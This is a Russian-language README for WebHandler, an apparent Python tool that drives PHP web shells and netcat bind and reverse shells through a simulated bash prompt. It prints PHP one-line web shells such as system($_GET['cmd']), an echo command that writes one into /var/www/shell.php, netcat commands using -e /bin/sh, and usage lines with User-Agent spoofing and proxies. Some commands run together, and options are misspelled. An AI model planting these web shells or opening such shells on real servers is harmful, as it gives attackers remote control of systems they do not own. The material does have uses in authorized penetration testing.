
Симулятор Bash для управления сервером с помощью системных функций PHP.
Обработчик для системных функций PHP, а также альтернативный обработчик для netcat
WebHandler пытается имитировать приглашение 'Linux bash' для обработки и выполнения:
- Функций выполнения программ PHP _(например, `system`, `passthru`, `exec` и т.д.)_
- Подключений прямой оболочки (bind shell)
- Подключений обратной оболочки (reserve shell)
Ещё одна возможность — подмена поля "User-Agent" в HTTP-заголовке. (--random-angent).
Также поддерживаются HTTP-прокси (--proxy http://<ip>:<port>)
WebHandler работает с POST и GET запросами:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>WebHandler является заменой для подключений netcat.
Пример прямого подключения (например, nc -lvvp 1234 -e /bin/sh)
Обычно пользователь делает:
netcat -l -p 1234nc -lvvp 1234Пример обратного подключения (например, nc 127.0.0.1 4321 -e /bin/sh)
Обычно пользователь делает:
netcat -l -p 4321nc -lvvp 4321--Пример файла:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.phpПараметр --url обязателен при отправке GET или POST запросов (например, для прямого 'веб-ориентированного PHP' подключения):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080Параметр --listen обязателен при ожидании подключения (например, для обратного 'сырого' подключения):
python webhandler.py --listen 1234Если версия вашего Python меньше 2.7.x, то argparse обязателен
Для установки выполните: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse ИЛИ sudo pip --install argparse.
readline необязателен. Этот модуль используется для расширенного редактирования строк и поддержки истории
git необязателен. Это позволяет поддерживать проект в актуальном состоянии